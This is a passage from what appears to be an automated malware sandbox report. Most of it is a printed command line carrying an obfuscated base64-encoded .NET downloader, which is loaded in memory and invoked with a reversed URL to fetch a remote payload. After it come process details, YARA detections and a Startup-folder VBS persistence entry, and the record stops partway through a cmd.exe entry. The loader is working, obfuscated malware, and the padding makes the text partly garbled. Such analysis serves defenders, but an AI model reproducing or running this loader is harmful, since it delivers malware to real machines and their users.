uM?? swCn?? gkBow?? SBCMBewCs?? iMBmwBq?? 0MBewCs?? kMBUw?? c?? i?? CewCs?? i?? CgwCn?? k?? CewCs?? k?? CgwCn?? m?? CewCs?? m?? CgwCn?? o?? CewCs?? o?? CgwCn?? q?? CgwCn?? s?? CgwCn?? u?? CgwCn?? u?? CewCs?? g?? DgwCn?? i?? DgwCn?? i?? DewCs?? nQ?? 2?? Dr?? ?? Q?? ?? Q?? F?? ?? U?? Bg?? H?? ?? c?? C?? ?? K?? ?? k?? ?? ?? ?? ?? BpwB?? ?? D0BKEB?? ?? DsBaYB?? ?? BjBqsB?? ?? D?? Bb?? B?? ?? BM?? bUB?? ?? C4B7sB?? ?? BpB7sB?? ?? DI?? M?? B?? g?? E?? ?? M?? ?? g?? F?? ?? U?? ?? g?? G?? ?? c?? ?? g?? H?? ?? k?? ?? g?? I?? ?? s?? ?? g?? J?? ?? 0?? ?? Q?? K?? ?? 0?? ?? g?? N?? ?? 8?? ?? g?? O?? BE?? ?? g?? Y?? BM?? Lg?? 1?? Dw?? QwDd?? P?? ?? /w?? G?? QS?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FMF?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? U?? XI?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BQBlgQ?? ?? ?? ?? ?? Cg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? HQF7?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? CYH?? ?? ?? J?? ?? Q?? Cg?? E?? ?? ?? ?? E?? ?? U?? E?? ?? ?? ?? ?? Q?? Cs?? Q?? ?? ?? ?? ?? ?? ?? LQB?? ?? HM?? 5gBz?? ?? kB?? ?? ?? ?? Q29udGV4dFZhbHVlYDE?? VGhyZWFkU2FmZU9iamVjdFByb3ZpZGVyYDE?? XzU?? Z2V0X1VURjg?? PE1vZHVsZT4?? V?? BEaXNwb3NlX19JbnN0YW5jZV9f?? ENyZWF0ZV9fSW5zdGFuY2VfXwBVRHNTaURiYgBtc2NvcmxpYgBNaWNyb3NvZnQuVmlzdWFsQmFzaWM?? TG9hZ?? BTeW5jaHJvbml6ZWQ?? R2V0TWV0aG9k?? FJlcGxhY2U?? Q3JlYXRlSW5zdGFuY2U?? Z2V0X0dldEluc3RhbmNl?? GRlZmF1bHRJbnN0YW5jZQBpbnN0YW5jZQBHZXRIYXNoQ29kZQBJbnZva2U?? UnVudGltZVR5cGVIYW5kbGU?? R2V0VHlwZUZyb21IYW5kbGU?? R2V0VHlwZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQByZXNvdXJjZUN1bHR1cmU?? TWV0aG9kQmFzZQBBcHBsaWNhdGlvbkJhc2U?? QXBwbGljYXRpb25TZXR0aW5nc0Jhc2U?? U3RyUmV2ZXJzZQBFZGl0b3JCcm93c2FibGVTdGF0ZQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRl?? EhlbHBLZXl3b3JkQXR0cmlidXRl?? EdlbmVyYXRlZENvZGVBdHRyaWJ1dGU?? RGVidWdnZXJOb25Vc2VyQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRl?? EVkaXRvckJyb3dzYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRl?? EFzc2VtYmx5VGl0bGVBdHRyaWJ1dGU?? U3RhbmRhcmRNb2R1bGVBdHRyaWJ1dGU?? SGlkZU1vZHVsZU5hbWVBdHRyaWJ1dGU?? QXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGU?? VGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRl?? ERlYnVnZ2VySGlkZGVuQXR0cmlidXRl?? EFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGU?? TXlHcm91cENvbGxlY3Rpb25BdHRyaWJ1dGU?? QXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRl?? EFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGU?? UnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGU?? Z2V0X1ZhbHVl?? HNldF9WYWx1ZQBHZXRPYmplY3RWYWx1ZQBVR2x5bXpVZwBzZXRfRW5jb2Rpbmc?? U3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5n?? ERvd25sb2FkU3RyaW5n?? FRvU3RyaW5n?? E1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFs?? FN5c3RlbS5Db21wb25lbnRNb2Rlb?? BscE9VcGxNcC5kbGw?? U3lzdGVt?? HJlc291cmNlTWFu?? FN5c3RlbS5Db21wb25lbnRNb2RlbC5EZXNpZ24?? QXBwRG9tYWlu?? GdldF9DdXJyZW50RG9tYWlu?? GdldF9BcHBsaWNhdGlvbgBNeUFwcGxpY2F0aW9u?? FN5c3RlbS5Db25maWd1cmF0aW9u?? FN5c3RlbS5HbG9iYWxpemF0aW9u?? FN5c3RlbS5SZWZsZWN0aW9u?? E1ldGhvZEluZm8?? Q3VsdHVyZUluZm8?? bHBPVXBsTX?? ?? bV9BcHBPYmplY3RQcm92aWRlcgBtX1VzZXJPYmplY3RQcm92aWRlcgBtX0NvbXB1dGVyT2JqZWN0UHJvdmlkZXI?? bV9NeVdlYlNlcnZpY2VzT2JqZWN0UHJvdmlkZXI?? Z2V0X1Jlc291cmNlTWFuYWdlcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBnZXRfVXNlcgBnZXRfQ29tcHV0ZXI?? TXlDb21wdXRlcgBBY3RpdmF0b3I?? LmN0b3I?? LmNjdG9y?? FN5c3RlbS5EaWFnbm9zdGljcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuRGV2aWNlcwBnZXRfV2ViU2VydmljZXM?? TXlXZWJTZXJ2aWNlcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQXBwbGljYXRpb25TZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM?? TWljcm9zb2Z0LlZpc3VhbEJhc2ljLkNvbXBpbGVyU2VydmljZXM?? U3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUmVzb3VyY2Vz?? GxwT1VwbE1wLk15LlJlc291cmNlcwBscE9VcGxNcC5SZXNvdXJjZXMucmVzb3VyY2Vz?? ERlYnVnZ2luZ01vZGVz?? FN0cmluZ3M?? Z2V0X1NldHRpbmdz?? E15U2V0dGluZ3M?? UmVmZXJlbmNlRXF1YWxz?? FJ1bnRpbWVIZWxwZXJz?? ENvbmNhd?? BPYmplY3Q?? TXlQcm9qZWN0?? FN5c3RlbS5OZXQ?? Z2V0X0RlZmF1bHQ?? V2ViQ2xpZW50?? ENvbnZlcnQ?? U3lzdGVtLlRleHQ?? bV9Db250ZXh0?? GxwT1VwbE1wLk15?? GdldF9Bc3NlbWJseQBNeVNldHRpbmdzUHJvcGVydHk?? ?? CVs?? H?? ?? TwBV?? H?? ?? b?? BN?? H?? ?? LgBS?? GU?? cwBv?? HU?? cgBj?? GU?? cw?? ?? V3Q?? e?? B0?? C4?? N?? ?? v?? H?? ?? bQB1?? HI?? Lw?? x?? DU?? Mg?? u?? Dc?? Nw?? x?? C4?? M?? ?? 1?? C4?? O?? ?? 5?? DE?? Q?? Bu?? G8?? d?? Bj?? GU?? d?? Bl?? GQ?? bwBu?? C8?? Lw?? 6?? H?? ?? d?? B0?? Gg?? ?? ?? VIJhEm?? QNB?? ?? BFawBy?? G8?? dwBl?? G0?? YQBy?? EY?? X?? BU?? EU?? Tg?? u?? HQ?? ZgBv?? HM?? bwBy?? GM?? aQBN?? Fw?? cwB3?? G8?? Z?? Bu?? Gk?? VwBc?? Do?? Qw?? ?? Fzk?? MQ?? z?? D?? ?? Mw?? u?? D?? ?? Lg?? 0?? HY?? X?? ?? ?? I2o?? SQBD?? HU?? Z?? BI?? E8?? T?? ?? u?? Ec?? WgBu?? G4?? SwBv?? Fc?? Yw?? ?? EXo?? egBH?? HY?? d?? Bw?? GI?? bw?? ?? GVw?? UgBl?? Gc?? UwB2?? GM?? cw?? u?? GU?? e?? Bl?? ?? ?? ?? hFFgqWcwdE6wlnV8YWFE?? g?? EI?? EBC?? Mg?? ?? EFI?? EBEREEI?? EBDgQg?? QECBS?? C?? Q4OBS?? B?? RFBBy?? E?? Q4ODg4GFRIo?? RIMBhUSK?? ESC?? YVEigBEmEGFRIo?? RIkBC?? ?? Ew?? F?? ?? ICHBwH?? ?? ESaRG?? iQUg?? BK?? jQcg?? gEOEoCNC?? ?? BEoCREoCRBgcEDg4ODgU?? ?? BK?? mQYg?? QESgJkE?? ?? EODgQg?? Q4OBS?? CDg4OBQ?? CDg4OBQ?? ?? EoClBQ?? BHQUOBy?? BEoCNHQUFI?? ESaQ4GI?? ESgK0OBi?? CHBwdH?? Q?? ?? RwcBC?? B?? hwDI?? ?? I?? y?? ?? DgQH?? R4?? ?? h4?? BR?? B?? B4?? B?? oBHg?? EBwET?? ?? YVEigBEw?? HBhUSbQET?? ?? YVEm0BEw?? CEw?? ECgET?? ?? Ug?? QET?? ?? i3elxWGTTgiQiwP19/EdUKOgcGFRIo?? RIMBwYVEigBEggHBhUSK?? ESYQcGFRIo?? RIk?? wYSfQQGEoCB?? wYSG?? M?? ?? ?? EE?? ?? ?? SD?? Q?? ?? BIIB?? ?? ?? EmEE?? ?? ?? SJ?? Q?? ?? BJ9BQ?? ?? EoCBBg?? B?? RK?? gQQ?? ?? BIYB?? ?? B?? Q4EI?? ?? SaQcQ?? QEe?? B4?? Bz?? B?? QEQHg?? EC?? ?? SD?? QI?? BIIB?? g?? EmEEC?? ?? SJ?? QI?? BJ9BQg?? EoCBB?? g?? EhgEK?? ?? T?? ?? gB?? ?? g?? ?? ?? ?? ?? ?? B4B?? ?? E?? V?? IWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEI?? Q?? C?? ?? ?? ?? ?? ?? ?? N?? Q?? IbHBPVXBsTX?? ?? ?? BcB?? BJDb3B5cmlnaHQgwqkgIDIwMjI?? ?? ?? UB?? ?? ?? ?? ?? CkB?? CRhMTU5NDFlMy03ZDM4LTQwYmEtYmI5MC1mYTE5YTZjNjg1NmI?? ?? ?? wB?? ?? cxLj?? uMC4w?? ?? BN?? Q?? cLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjUuMQE?? V?? 4URnJhbWV3b3JrRGlzcGxheU5hbWUULk5FVCBGcmFtZXdvcmsgNC41LjEE?? Q?? ?? ?? ?? gB?? ?? E?? ?? ?? ?? ?? ?? BgB?? ?? pNeVRlbXBsYXRlCDExLj?? uMC4w?? ?? BB?? Q?? zU3lzdGVtLlJlc291cmNlcy5Ub29scy5TdHJvbmdseVR5cGVkUmVzb3VyY2VCdWlsZGVyCDE3Lj?? uMC4w?? ?? BZ?? QBLTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5FZGl0b3JzLlNldHRpbmdzRGVzaWduZXIuU2V0dGluZ3NTaW5nbGVGaWxlR2VuZXJhdG9yCDE3Lj?? uMy4w?? ?? Bh?? Q?? 0U3lzdGVtLldlYi5TZXJ2aWNlcy5Qcm90b2NvbHMuU29hcEh0dHBDbGllbnRQcm90b2NvbBJDcmVhdGVfX0luc3RhbmNlX18TRGlzcG9zZV9fSW5zdGFuY2VfXw?? ?? ?? B?? B?? ?? tNeS5Db21wdXRlcg?? ?? EwE?? Dk15LkFwcGxpY2F0aW9u?? ?? ?? M?? Q?? HTXkuVXNlcg?? ?? EwE?? Dk15LldlYlNlcnZpY2Vz?? ?? ?? Q?? Q?? LTXkuU2V0dGluZ3M?? ?? ?? C0?? ?? ?? ?? zsrvvgE?? ?? ?? CR?? ?? ?? ?? bFN5c3RlbS5SZXNvdXJjZXMuUmVzb3VyY2VSZWFkZXIsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLj?? sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZT?? 4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNld?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FBBRFBBRFC0?? ?? ?? ?? ?? ?? ?? ?? ?? H6xN+k?? ?? ?? ?? ?? ?? g?? ?? ?? Gk?? ?? ?? BEOQ?? ?? RBs?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BSU0RTz7YbjMR2n0y4xJgHLeBcd?? E?? ?? ?? BEOlxIYWNraW5nXENyeXB0ZXJzIE1vZGRpbmdcQ2xhc3NMaWJyYXJ5M1xDbGFzc0xpYnJhcnkzXG9ialxSZWxlYXNlXGxwT1VwbE1wLnBkYgDVOQ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DvOQ?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 4Tk?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BfQ29yRGxsTWFpbgBtc2NvcmVlLmRsb?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? /yU?? I?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? B?? ?? ?? ?? ?? Y?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? E?? ?? ?? ?? w?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? BI?? ?? ?? ?? WE?? ?? ?? DwD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DwDN?? ?? ?? ?? FY?? UwBf?? FY?? RQBS?? FM?? SQBP?? E4?? XwBJ?? E4?? RgBP?? ?? ?? ?? ?? ?? C9BO/+?? ?? ?? B?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? /?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? R?? ?? ?? ?? ?? E?? VgBh?? HI?? RgBp?? Gw?? ZQBJ?? G4?? ZgBv?? ?? ?? ?? ?? ?? ?? k?? ?? Q?? ?? ?? BU?? HI?? YQBu?? HM?? b?? Bh?? HQ?? aQBv?? G4?? ?? ?? ?? ?? ?? ?? ?? ?? s?? Sc?? g?? ?? ?? QBT?? HQ?? cgBp?? G4?? ZwBG?? Gk?? b?? Bl?? Ek?? bgBm?? G8?? ?? ?? B4?? g?? ?? ?? Q?? w?? D?? ?? M?? ?? w?? D?? ?? N?? Bi?? D?? ?? ?? ?? ?? q?? ?? k?? ?? QBD?? G8?? bQBt?? GU?? bgB0?? HM?? ?? ?? Bs?? H?? ?? TwBV?? H?? ?? b?? BN?? H?? ?? ?? ?? ?? ?? ?? DI?? CQ?? B?? EM?? bwBt?? H?? ?? YQBu?? Hk?? TgBh?? G0?? ZQ?? ?? ?? ?? ?? ?? b?? Bw?? E8?? VQBw?? Gw?? TQBw?? ?? ?? ?? ?? ?? ?? 6?? ?? k?? ?? QBG?? Gk?? b?? Bl?? EQ?? ZQBz?? GM?? cgBp?? H?? ?? d?? Bp?? G8?? bg?? ?? ?? ?? ?? ?? b?? Bw?? E8?? VQBw?? Gw?? TQBw?? ?? ?? ?? ?? ?? ?? w?? ?? g?? ?? QBG?? Gk?? b?? Bl?? FY?? ZQBy?? HM?? aQBv?? G4?? ?? ?? ?? ?? ?? DE?? Lg?? w?? C4?? M?? ?? u?? D?? ?? ?? ?? ?? 6?? ?? 0?? ?? QBJ?? G4?? d?? Bl?? HI?? bgBh?? Gw?? TgBh?? G0?? ZQ?? ?? ?? Gw?? c?? BP?? FU?? c?? Bs?? E0?? c?? ?? u?? GQ?? b?? Bs?? ?? ?? ?? ?? ?? BI?? BI?? ?? QBM?? GU?? ZwBh?? Gw?? QwBv?? H?? ?? eQBy?? Gk?? ZwBo?? HQ?? ?? ?? BD?? G8?? c?? B5?? HI?? aQBn?? Gg?? d?? ?? g?? Kk?? I?? ?? g?? DI?? M?? ?? y?? DI?? ?? ?? ?? q?? ?? E?? ?? QBM?? GU?? ZwBh?? Gw?? V?? By?? GE?? Z?? Bl?? G0?? YQBy?? Gs?? cw?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EI?? DQ?? B?? E8?? cgBp?? Gc?? aQBu?? GE?? b?? BG?? Gk?? b?? Bl?? G4?? YQBt?? GU?? ?? ?? Bs?? H?? ?? TwBV?? H?? ?? b?? BN?? H?? ?? LgBk?? Gw?? b?? ?? ?? ?? ?? ?? ?? Mg?? J?? ?? E?? U?? By?? G8?? Z?? B1?? GM?? d?? BO?? GE?? bQBl?? ?? ?? ?? ?? ?? Bs?? H?? ?? TwBV?? H?? ?? b?? BN?? H?? ?? ?? ?? ?? ?? ?? DQ?? C?? ?? B?? F?? ?? cgBv?? GQ?? dQBj?? HQ?? VgBl?? HI?? cwBp?? G8?? bg?? ?? ?? DE?? Lg?? w?? C4?? M?? ?? u?? D?? ?? ?? ?? ?? 4?? ?? g?? ?? QBB?? HM?? cwBl?? G0?? YgBs?? Hk?? I?? BW?? GU?? cgBz?? Gk?? bwBu?? ?? ?? ?? MQ?? u?? D?? ?? Lg?? w?? C4?? M?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? w?? ?? ?? M?? ?? ?? ?? BDo?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ';[Byte[]] $fuUN = [System.Convert]::FromBase64String( $LHgK.replace('?? ','A') );[System.AppDomain]::CurrentDomain.Load($fuUN).GetType('lpOUplMp.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('txt.asacWENtarJN02%4602%esab/asac02%WENtarJN/moc.oueu.wenasactarjn//:ptth'))
Imagebase:	0x7ff777fc0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: SUSP_Reversed_Base64_Encoded_EXE, Description: Detects an base64 encoded executable with reversed characters, Source: 00000010.00000002.355723069.000002165D9D2000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_Reversed_Base64_Encoded_EXE, Description: Detects an base64 encoded executable with reversed characters, Source: 00000010.00000002.355709733.000002165D9B2000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_Reversed_Base64_Encoded_EXE, Description: Detects an base64 encoded executable with reversed characters, Source: 00000010.00000002.354839665.000002164DEDA000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_Reversed_Base64_Encoded_EXE, Description: Detects an base64 encoded executable with reversed characters, Source: 00000010.00000002.354821380.000002164DEC5000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_Reversed_Base64_Encoded_EXE, Description: Detects an base64 encoded executable with reversed characters, Source: 00000010.00000002.354785224.000002164DE7B000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_DLAgent09, Description: Detects known downloader agent, Source: 00000010.00000002.357567873.0000021665E70000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	high

Analysis Process: wscript.exePID: 1744, Parent PID: 3352

General

Target ID:	18
Start time:	06:49:32
Start date:	21/02/2022
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs"
Imagebase:	0x7ff6f8410000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exePID: 5992, Parent PID: 1744

General

Target ID:	19
Start time:	06:49:34
